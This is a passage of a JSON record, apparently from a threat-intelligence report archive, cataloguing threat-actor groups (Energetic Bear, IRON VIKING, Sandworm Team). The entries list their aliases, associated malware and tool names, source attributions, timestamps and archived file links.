"Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434071, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/783fd5b25678a528a3486a381f3860dec20d8495.pdf", "text": "https://archive.orkl.eu/783fd5b25678a528a3486a381f3860dec20d8495.txt", "img": "https://archive.orkl.eu/783fd5b25678a528a3486a381f3860dec20d8495.jpg" } }